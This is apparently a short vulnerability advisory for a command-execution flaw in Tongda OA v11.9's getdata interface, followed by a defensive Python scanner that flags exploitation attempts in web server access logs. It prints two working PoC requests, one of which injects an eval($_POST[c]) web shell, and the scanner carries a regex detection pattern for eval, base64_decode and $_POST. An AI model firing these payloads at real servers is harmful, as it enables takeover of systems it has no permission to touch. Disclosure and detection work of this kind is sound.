Tongda OA v11.9 getdata arbitrary command execution vulnerability
Vulnerability Description
The getdata interface of Tongda OA v11.9 contains an arbitrary command execution vulnerability. Through it, an attacker can execute arbitrary commands on the server and gain control of the server.
Vulnerability Impact
Tongda OA v11.9
Network mapping
Vulnerability reproduction
[Screenshot: login page]
Verify PoC
/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB2dWxuX3Rlc3Q7%22)))%3B/*&id=19&module=Carouselimage
/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
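A defender-side check for this issue, added here as an example and not part of the original advisory: it scans web server access log lines for requests to the getdata endpoint whose activeTab parameter, once URL-decoded, carries PHP code constructs such as eval( or base64_decode(. The endpoint path and the two flagged query strings come from the PoC above; the log lines themselves are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint named in the advisory above.
GETDATA_PATH = "/general/appbuilder/web/portal/gateway/getdata"

# PHP constructs that never belong in a portal tab name.
SUSPICIOUS = re.compile(
    r"eval\s*\(|base64_decode\s*\(|system\s*\(|\$_(?:POST|GET|REQUEST)\b|/\*",
    re.IGNORECASE,
)

# Apache/Nginx combined-format request line: "GET /path?query HTTP/1.1"
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_getdata_injection(request_target: str) -> bool:
    """True when a request targets getdata with a PHP-code-like activeTab value."""
    parts = urlsplit(request_target)
    if parts.path.lower() != GETDATA_PATH:
        return False
    # parse_qs URL-decodes each value; undecodable bytes (e.g. the lone %E5 in
    # the PoC) are replaced rather than raising, so the scan never aborts.
    params = parse_qs(parts.query, keep_blank_values=True, errors="replace")
    return any(SUSPICIOUS.search(value) for value in params.get("activeTab", []))


def scan_access_log(lines):
    """Return (line_number, request_target) for every line matching the pattern."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_LINE.search(line)
        if match and is_getdata_injection(match.group("target")):
            hits.append((number, match.group("target")))
    return hits


# Constructed sample log (hypothetical hosts and timestamps, not real traffic):
# lines 2 and 3 carry the advisory's PoC query strings, the rest are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=home&id=19&module=Carouselimage HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB2dWxuX3Rlc3Q7%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1" 200 87',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage HTTP/1.1" 200 87',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /general/login_code.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, target in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: suspicious getdata request: {target}")
```

Point the scanner at the real access log of an exposed Tongda OA instance; any hit should be treated as an exploitation attempt against an unpatched v11.9 install and followed up with patching and host-level review.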
This post is licensed under CC BY 4.0 by the author.